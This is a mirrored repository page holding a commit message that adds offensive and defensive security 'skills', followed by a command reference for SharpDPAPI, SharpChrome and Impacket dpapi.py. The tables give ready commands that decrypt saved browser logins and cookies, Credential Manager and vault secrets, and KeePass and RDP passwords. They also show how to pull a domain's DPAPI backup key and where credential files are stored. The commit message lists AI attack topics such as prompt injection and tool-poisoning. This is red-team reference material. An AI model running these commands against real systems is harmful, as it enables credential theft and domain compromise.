mirror of
https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git
synced 2026-06-26 11:44:37 +03:00
8cae0648ec
Demand-driven expansion targeting the fastest-growing 2025-2026 threat and
skills categories (ISC2/WEF/CrowdStrike/Mandiant signals):
- AI Security (NEW domain, 12 skills): LLM red-teaming with garak/PyRIT,
prompt injection (direct/indirect/RAG), MCP tool-poisoning, agentic tool
invocation, guardrails, model/data poisoning, system-prompt leakage,
embedding/vector weaknesses, model extraction, continuous red-teaming
- Supply Chain Security (NEW domain, 5 skills): SBOMs, dependency confusion,
malicious-npm triage, typosquatting, SLSA/Sigstore provenance
- Hardware & Firmware Security (NEW domain, 4 skills): CHIPSEC/UEFI audit,
Secure Boot bypass, TPM measured-boot attestation, ESP bootkit hunting
- Identity (10): Entra ID/ROADtools, GraphRunner, AADInternals, ADCS/Certipy,
shadow credentials, coercion, BloodHound CE, device-code phishing, SSO abuse
- Cloud-native (8): Stratus, Pacu, CloudFox, container escape, K8s RBAC,
Falco, Trivy, kube-bench
- Offensive C2 (6): Sliver, Havoc, NetExec, DPAPI, NTLM relay ESC8, redirectors
- DFIR (6): Hayabusa, Chainsaw, KAPE, Velociraptor, EZ Tools, Plaso
- Backfill (4): OpenCTI, MISP, honeytokens, post-quantum crypto migration
Each skill follows the repo taxonomy (SKILL.md + references/{standards,api-reference}.md
+ scripts/agent.py + LICENSE), with researched real tool commands (no placeholders),
complete frontmatter, and ATT&CK/ATLAS + NIST CSF mappings. Updates README domain
table, skill count, and index.json.
74 lines
3.3 KiB
Markdown
# SharpDPAPI / DPAPI — Command Reference

## SharpDPAPI User Commands

| Command | Purpose | Example |
|---------|---------|---------|
| `triage` | Run the `credentials`, `vaults`, `rdg`, `keepass` and `certificates` commands in one pass | `SharpDPAPI.exe triage /unprotect` |
| `masterkeys` | Decrypt the current user's master keys; prints `{GUID}:SHA1` mappings reusable via `/mkfile` | `SharpDPAPI.exe masterkeys /password:Pass` |
| `credentials` | Decrypt Credential Manager blobs | `SharpDPAPI.exe credentials /pvk:key.pvk` |
| `vaults` | Decrypt Credential Vault entries | `SharpDPAPI.exe vaults /pvk:key.pvk` |
| `rdg` | Decrypt RDP passwords stored in RDCMan `.rdg` / `RDCMan.settings` files | `SharpDPAPI.exe rdg /unprotect` |
| `keepass` | Decrypt KeePass `ProtectedUserKey.bin` DPAPI blobs | `SharpDPAPI.exe keepass /unprotect` |
| `certificates` | Decrypt certificate private keys (CAPI/CNG key stores) | `SharpDPAPI.exe certificates /unprotect /showall` |

## SharpDPAPI Machine Commands (require admin/SYSTEM)

| Command | Purpose |
|---------|---------|
| `machinemasterkeys` | Decrypt machine master keys (needs the DPAPI_SYSTEM LSA secret, which is why SYSTEM is required) |
| `machinecredentials` | Decrypt machine-scoped credential blobs |
| `machinevaults` | Decrypt machine-scoped vault entries |
| `machinetriage` | Run all machine-scoped triage commands |

## SharpDPAPI Supporting Commands

| Command | Purpose | Example |
|---------|---------|---------|
| `backupkey` | Retrieve the domain DPAPI backup key (.pvk) from a DC via MS-BKRP; requires Domain Admin-equivalent rights, and the key then decrypts any domain user's master keys via `/pvk:` | `SharpDPAPI.exe backupkey /server:dc01 /file:key.pvk` |

## Common Flags

| Flag | Meaning |
|------|---------|
| `/unprotect` | Decrypt with a live `CryptUnprotectData` call in the current user context (online; no keys needed) |
| `/password:<pw>` | Decrypt master keys offline with the user's plaintext password |
| `/ntlm:<hash>` | Decrypt master keys offline with the user's NTLM hash |
| `/pvk:<file>` | Decrypt master keys with the domain backup private key |
| `/mkfile:<file>` | Supply a file of `{GUID}:SHA1` master key mappings (the output of `masterkeys`) |
| `/server:<dc>` | Target DC for `backupkey` retrieval |
| `/target:<path>` | Target file or folder to decrypt instead of the default locations |
| `/rpc` | Ask a DC to decrypt master keys over MS-BKRP; works for the current domain user's own keys without knowing the password |
| `/showall` | Show all certificates / verbose output |

## SharpChrome Commands

| Command | Purpose | Example |
|---------|---------|---------|
| `logins` | Decrypt saved browser logins | `SharpChrome.exe logins /unprotect` |
| `cookies` | Decrypt browser cookies | `SharpChrome.exe cookies /pvk:key.pvk` |
| `statekeys` | Decrypt the DPAPI-protected AES state key stored in the browser's `Local State` file | `SharpChrome.exe statekeys /unprotect` |

Caveat: Chromium's newer app-bound encryption wraps the cookie key an extra time under the SYSTEM context, so a user-context `/unprotect` recovers only the legacy state key, not values protected by the app-bound key.

## Impacket dpapi.py (Linux)

| Subcommand | Purpose | Example |
|------------|---------|---------|
| `masterkey` | Decrypt a master key file with the domain backup key (`-pvk`) or with `-sid` plus `-password` | `impacket-dpapi masterkey -file MK -pvk key.pvk` |
| `credential` | Decrypt a credential blob; `-key` is the `0x…` value printed by `masterkey` | `impacket-dpapi credential -file CRED -key 0x<mk>` |
| `vault` | Decrypt vault policy/credential files | `impacket-dpapi vault -vpol VPOL -vcrd VCRD -key 0x<mk>` |
| `backupkeys` | Retrieve the domain backup key from a DC and write it to a `.pvk` file with `--export` | `impacket-dpapi backupkeys -t corp.local/admin@dc01 --export` |

## Key File Locations

| Path | Contents |
|------|----------|
| `%APPDATA%\Microsoft\Protect\<SID>\` | User master keys (one file per `{GUID}`) |
| `%WINDIR%\System32\Microsoft\Protect\S-1-5-18\` (and its `User\` subfolder) | Machine master keys |
| `%APPDATA%\Microsoft\Credentials\` / `%LOCALAPPDATA%\Microsoft\Credentials\` | Credential Manager blobs |
| `%APPDATA%\Microsoft\Vault\` / `%LOCALAPPDATA%\Microsoft\Vault\` | Credential Vault |

## External References

- SharpDPAPI README: https://github.com/GhostPack/SharpDPAPI
- Impacket: https://github.com/fortra/impacket